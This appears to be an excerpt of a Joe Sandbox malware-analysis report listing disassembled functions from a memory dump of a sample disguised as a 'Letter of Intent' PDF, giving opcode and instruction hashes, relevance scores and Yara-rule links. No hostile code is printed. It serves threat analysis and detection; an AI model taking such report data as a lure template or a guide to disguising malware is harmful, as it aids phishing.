                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cfb4a3ee94ed77c88eb0d3a9bab6c2770203bfe68816580865210a8e542d3c42
                                                                                      • Instruction ID: b8b55233effaa4135f40936c6de2cbffe93233e1720ffc42dfd57cb92a450c13
                                                                                      • Opcode Fuzzy Hash: cfb4a3ee94ed77c88eb0d3a9bab6c2770203bfe68816580865210a8e542d3c42
                                                                                      • Instruction Fuzzy Hash: 911109B0A10249DFDB04DFA9D555A9DFBF4FF08304F0446AAE518EB382EA74D9418B94
                                                                                      Function 3304F78A Relevance: .0, Instructions: 42COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0e522d7ca0188f434e945ef017225d1aa3ae0fd9cbb5b8c23e5fa7b8477c4793
                                                                                      • Instruction ID: 2f627ce7ef090cfe71191553c1616ebeaddc9e9cc83d3239f85a2e8ea1ebafbe
                                                                                      • Opcode Fuzzy Hash: 0e522d7ca0188f434e945ef017225d1aa3ae0fd9cbb5b8c23e5fa7b8477c4793
                                                                                      • Instruction Fuzzy Hash: F40140B4E0030D9FCB04DFA9C545AAEB7F4EF08304F008465A915E7340E674DA00CF50
                                                                                      Function 3304F2F8 Relevance: .0, Instructions: 41COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7ba629df79da04a902e4caeb4a6fd150146d1b02d1f16de7db0952dc0050a8fe
                                                                                      • Instruction ID: 4aedde252593eb4d9cb0d760a7e8d8ab3b4389d6b1e30a97df045e80c64829bd
                                                                                      • Opcode Fuzzy Hash: 7ba629df79da04a902e4caeb4a6fd150146d1b02d1f16de7db0952dc0050a8fe
                                                                                      • Instruction Fuzzy Hash: C3F04472A10748ABD704DBB9C415AAEB7B8EF44710F4484A6E611EB290EAB4DA018B65
                                                                                      Function 32FC724D Relevance: .0, Instructions: 40COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
                                                                                      • Instruction ID: 74c8112902dff48ecfd81d8290884e694344aec746275d76e8ff8105734e2d4d
                                                                                      • Opcode Fuzzy Hash: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
                                                                                      • Instruction Fuzzy Hash: 17F0F6FAA013666FEB14C7A98940FEE77ACAFC0764F048995BF0197148DA30D940CA90
                                                                                      Function 330653FC Relevance: .0, Instructions: 39COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d303a9a5a672ee782f51806784211d50a9ca65737aabd377fc4a5cf5f9dcfcd6
                                                                                      • Instruction ID: 9d1e6060d342012630c155e4d28fda0fc9efc64f2680fb94d21384f9dc60a8c8
                                                                                      • Opcode Fuzzy Hash: d303a9a5a672ee782f51806784211d50a9ca65737aabd377fc4a5cf5f9dcfcd6
                                                                                      • Instruction Fuzzy Hash: 88012CB0E00209DFDB04DFA9C545B9EF7F4FF08304F1486A9A519EB381EA749A418BA4
                                                                                      Function 33063749 Relevance: .0, Instructions: 38COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9c86c39bdb6e5f373c63bc0b61fffc749c090866831c7dd43b14b299580d1563
                                                                                      • Instruction ID: 5a8c27ef4b3d0b59c4e57110faa6dba2108dfe9430ff248cc99fc3271fafc943
                                                                                      • Opcode Fuzzy Hash: 9c86c39bdb6e5f373c63bc0b61fffc749c090866831c7dd43b14b299580d1563
                                                                                      • Instruction Fuzzy Hash: 75F03CB6940204ABE7119B64CD41FDAB7BCEB04714F0005A6AA56E6194EAB0AA44CB90
                                                                                      Function 3304F3E6 Relevance: .0, Instructions: 35COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d519f89a698dd514a9c2e57c8c8ccf1b45ba4a44f8e089fbb50d6e4f46ecbc09
                                                                                      • Instruction ID: 2158deb5d7e395b04ee906e00907921123d9ce32236d142bfbcff45c14622044
                                                                                      • Opcode Fuzzy Hash: d519f89a698dd514a9c2e57c8c8ccf1b45ba4a44f8e089fbb50d6e4f46ecbc09
                                                                                      • Instruction Fuzzy Hash: 49F04FB5E0024CEFCB04DFA9D545A9EB7F4EF48300F408469BA45EB391EA74EA01CB54
                                                                                      Function 330655C9 Relevance: .0, Instructions: 35COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 888448c3008294906c2f30ad96846fc51675a23281903f9d55c7b149f302a83d
                                                                                      • Instruction ID: bef40231e674153308e949d775def51251ec07c25498d9a4df655302b759cc4c
                                                                                      • Opcode Fuzzy Hash: 888448c3008294906c2f30ad96846fc51675a23281903f9d55c7b149f302a83d
                                                                                      • Instruction Fuzzy Hash: 4DF044B4A0024CEFDB04DFA8D545A9DB7F4EF08304F504455B945EB380D674DA00CB54
                                                                                      Function 32FD1BEF Relevance: .0, Instructions: 34COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ef4750456ae3852a60f4691eeb70dfdb16eb11f2ef1d1bcb091cf1d683269fb5
                                                                                      • Instruction ID: a3e11da3a89f7a839211be1c838a128531d80fc7972c450cb3ba560ab76639d8
                                                                                      • Opcode Fuzzy Hash: ef4750456ae3852a60f4691eeb70dfdb16eb11f2ef1d1bcb091cf1d683269fb5
                                                                                      • Instruction Fuzzy Hash: FDF0E2713806119AF766BB2CDD40B5732E1BB50B80F180C68E644CF5A4DA60CCC1DB80
                                                                                      Function 3304F6C7 Relevance: .0, Instructions: 33COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2a4a0879314a1d20042ae32072e193179ee7911a483331254d45d7d2dd850e57
                                                                                      • Instruction ID: bc53ef14af1d2181d7c8ab4529e71d026981a64cefb70e4919d41278d5808704
                                                                                      • Opcode Fuzzy Hash: 2a4a0879314a1d20042ae32072e193179ee7911a483331254d45d7d2dd850e57
                                                                                      • Instruction Fuzzy Hash: 13F062B5A10248EFDB04DFA9C505EAEB7F4AF04304F444469E601EB291EA74DA01CB54
                                                                                      Function 3306539D Relevance: .0, Instructions: 31COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4dca628c5900d0a33070d9c740d3d00a20ee4995e50ef2c3ff6a138e73547ed2
                                                                                      • Instruction ID: ea8e2b78acd92ec666422cfe6689d4d9b8e7712854e2a8ab1afb2eb5aa8fc3ae
                                                                                      • Opcode Fuzzy Hash: 4dca628c5900d0a33070d9c740d3d00a20ee4995e50ef2c3ff6a138e73547ed2
                                                                                      • Instruction Fuzzy Hash: 3FF0B470A1034C9FD704DBB8D445E5DB7F4EF44704F508494E601EB280DAB4D9018B18
                                                                                      Function 33065283 Relevance: .0, Instructions: 31COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1e82c240127ee15e288337d6a6c64bf4df658bacdecbe7daa538d43ef0ec7233
                                                                                      • Instruction ID: 4277c7f0ff1cc617fda6328faf62e6a1a457dcb900c4b6488c671b2daffb2132
                                                                                      • Opcode Fuzzy Hash: 1e82c240127ee15e288337d6a6c64bf4df658bacdecbe7daa538d43ef0ec7233
                                                                                      • Instruction Fuzzy Hash: 76F0B4B0A103099BD704DBA4D505E6EB3F4EF04304F444858A541EB285EA74D9008B54
                                                                                      Function 330652E2 Relevance: .0, Instructions: 31COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dfae8066f0fd555ca254894fffd600b45311410ec1799fe0a909f694e258f014
                                                                                      • Instruction ID: 17eed96a40887086061c0d720a7710b388a9436de9d20d0e9197b7b7e7d8edba
                                                                                      • Opcode Fuzzy Hash: dfae8066f0fd555ca254894fffd600b45311410ec1799fe0a909f694e258f014
                                                                                      • Instruction Fuzzy Hash: C6F0B470A107489BD704DFB5D505E6EB3F4EF44704F444868A501EB280EAB4D900CB18
                                                                                      Function 32FC9B28 Relevance: .0, Instructions: 31COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 07465dbd088d7ed6d4fd5dee63399da8b2eb969b36211f6c3a248cfa3d236ea3
                                                                                      • Instruction ID: d506ae47fbdbe1f578546a52c5dd814de020a2d5ff159509ba84d2a70b55eb0a
                                                                                      • Opcode Fuzzy Hash: 07465dbd088d7ed6d4fd5dee63399da8b2eb969b36211f6c3a248cfa3d236ea3
                                                                                      • Instruction Fuzzy Hash: CAF0BE7D9256989FF311C718C680B9A73EAEB00BA4F4D58A4E48587912C730E980CA50
                                                                                      Function 33065341 Relevance: .0, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 59b3620df9b3d4ce7a3516f21eac8dd4ae698701890757b8f436f0b67fab2a3e
                                                                                      • Instruction ID: 1b21a2131790e86c4754f1acaac6ce93d80aa9090d103e75b20adec82d933e70
                                                                                      • Opcode Fuzzy Hash: 59b3620df9b3d4ce7a3516f21eac8dd4ae698701890757b8f436f0b67fab2a3e
                                                                                      • Instruction Fuzzy Hash: 83F082B0A00248ABDB04DBA9D555E9EB7F4EF49744F540899A611EB2D4EAB4D9008718
                                                                                      Function 32FC7208 Relevance: .0, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2a43741870f27a30880a908f95195ffe918c7ac70ef0a55a113f8c24779cfc9e
                                                                                      • Instruction ID: dcfd22e837eda64abe26124d9caf5ec5e46e7b861c4e8f49b809d5b1ee191084
                                                                                      • Opcode Fuzzy Hash: 2a43741870f27a30880a908f95195ffe918c7ac70ef0a55a113f8c24779cfc9e
                                                                                      • Instruction Fuzzy Hash: ECF0A7B99217949FF311D799C184B4277DCDB81BB9F0D45E1D4058B502CB78D8C0CE54
                                                                                      Function 33065227 Relevance: .0, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6f2f3c8b41dc73adaa6e70652e93d0dd6b61e91d836278dff38b487431b60237
                                                                                      • Instruction ID: f11999af119a3cdf190efa22ec5b543ad316bf6ea2087a3ad3b01c214aed433f
                                                                                      • Opcode Fuzzy Hash: 6f2f3c8b41dc73adaa6e70652e93d0dd6b61e91d836278dff38b487431b60237
                                                                                      • Instruction Fuzzy Hash: C7F0A7B0A14349EBDB04EBF8D515E6EB3F4EF04704F440898BA02EB2D5EAB4D901C758
                                                                                      Function 330651CB Relevance: .0, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dbdde213aeae542dc6ab0e556bb062d86cb220de3f3556ce2e06e01f5fb62e13
                                                                                      • Instruction ID: 098224824ba6f6a11a7732facf6c8cf10ac3bdb10f638b95c03a849c3adbfead
                                                                                      • Opcode Fuzzy Hash: dbdde213aeae542dc6ab0e556bb062d86cb220de3f3556ce2e06e01f5fb62e13
                                                                                      • Instruction Fuzzy Hash: C2F082B0A1024DABDB04DBE8D915E5EB3F4EF04708F440859BA11EB2D4EAB4E901CB58
                                                                                      Function 3300D070 Relevance: .0, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                                                      • Instruction ID: 8ba3c57372effafe695a1267ac3da2922c2054e4a3e7d2ac3231c6b2900a81e0
                                                                                      • Opcode Fuzzy Hash: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                                                      • Instruction Fuzzy Hash: 8EF0E53351461467C230AA19CC05F5BFBACDBD5B70F14071ABA649B1D0DAB0D901CBE6
                                                                                      Function 3304F72E Relevance: .0, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 531ff1343c49cc823bf96769f49cfdef752418444a77a4a879cef77a4fb4871a
                                                                                      • Instruction ID: d36381e7aba77adfa8582d285c9f77393226caf0c7502a7a12be521881c3b732
                                                                                      • Opcode Fuzzy Hash: 531ff1343c49cc823bf96769f49cfdef752418444a77a4a879cef77a4fb4871a
                                                                                      • Instruction Fuzzy Hash: CCF0A7B1A00748EBDB04DBB9C559E9FB7F4EF08704F4404A4F601EB2C0E9B4D9018B18
                                                                                      Function 3306547F Relevance: .0, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: db3f7ab19b4c06bf1b0d13621771edc97b73be567e0ceed9a0354e23b2178da1
                                                                                      • Instruction ID: 65397576410f8e4472f40ade7b565835e333fdb2b9bfd9e712f47fe000f552e2
                                                                                      • Opcode Fuzzy Hash: db3f7ab19b4c06bf1b0d13621771edc97b73be567e0ceed9a0354e23b2178da1
                                                                                      • Instruction Fuzzy Hash: 91F082B0A01248ABDB04DBA9D555E9EB7F4EF08708F540494E601EB384EA74D9018758
                                                                                      Function 330654DB Relevance: .0, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 52467a25b4d11f4fa1f3ea64da1fb332d89f4acae4bdeeb57b3dcdebedb609d3
                                                                                      • Instruction ID: 9505511426a3910aa68572385bff5f0dd14ae1c7ff6b2064ac07b62fcbc2e1cd
                                                                                      • Opcode Fuzzy Hash: 52467a25b4d11f4fa1f3ea64da1fb332d89f4acae4bdeeb57b3dcdebedb609d3
                                                                                      • Instruction Fuzzy Hash: D6F082B0A10648ABDB04DBA9D569F9EB7F4EF08708F540498A601EB284EA74D9008B18
                                                                                      Function 3304FB97 Relevance: .0, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
